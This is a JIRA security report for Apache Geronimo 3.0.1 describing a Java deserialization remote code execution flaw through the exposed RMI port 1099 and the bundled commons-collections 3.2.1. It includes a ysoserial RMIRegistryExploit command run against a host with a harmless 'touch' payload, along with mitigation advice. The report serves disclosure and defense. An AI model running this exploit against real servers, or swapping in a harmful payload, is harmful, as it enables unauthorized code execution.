You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@geronimo.apache.org by "sevck (JIRA)" <ji...@apache.org> on 2017/11/29 02:22:00 UTC

[jira] [Created] (GERONIMO-6596) Apache Geronimo Remote Code Execute Vulnerability

sevck created GERONIMO-6596:
-------------------------------

             Summary: Apache Geronimo Remote Code Execute Vulnerability
                 Key: GERONIMO-6596
                 URL: https://issues.apache.org/jira/browse/GERONIMO-6596
             Project: Geronimo
          Issue Type: Bug
      Security Level: public (Regular issues)
          Components: dependencies, security
    Affects Versions: 3.0.1
         Environment: linux,windows
            Reporter: sevck
            Priority: Critical


The unsupported Geronimo old versions may be also affected

Description:
The Apache Geronimo default enabled JAVA RMI 1099 port and default bind ip 0.0.0.0, in bash, I use "grep -R InvokerTransformer" command, find defalut use commons-collections-3.2.1.jar.

[root@localhost geronimo-tomcat7-javaee6-3.0.1]# grep -R InvokerTransformer .
Binary file ./repository/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar matches

This looks like JAVA deserialization is taken for granted. But,I use ysoserial tools. CommonsCollections1 in response
java.lang.ClassNotFoundException: org.apache.commons.collections.map.TransformedMap (no security manager: RMI class loader disabled),
Seems to be classpath error, In java version 7u21 chanlog:
-------------------------------------
Changes to RMI
From this release, the RMI property java.rmi.server.useCodebaseOnly is set to true by default. In previous releases the default value was false.

This change of default value may cause RMI-based applications to break unexpectedly. The typical symptom is a stack trace that contains a java.rmi.UnmarshalException containing a nested java.lang.ClassNotFoundException.

For more information, see RMI Enhancements.
---------------------------------------
so,use 7u21 run application.
attack server: 
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099  Jdk7u21 "touch /tmp/apache_geronimo"


Mitigation:
Commons-collections-3.2.1 users should upgrade to 3.2.2
Ports are not allowed for public access
Exploit:
(precondition: server run jre version is 7u21)
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099  Jdk7u21 "touch /tmp/apache_geronimo"
Credit:
This issue was discovered by QingTeng cloud Security of Minded Security Researcher jianan.huang



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)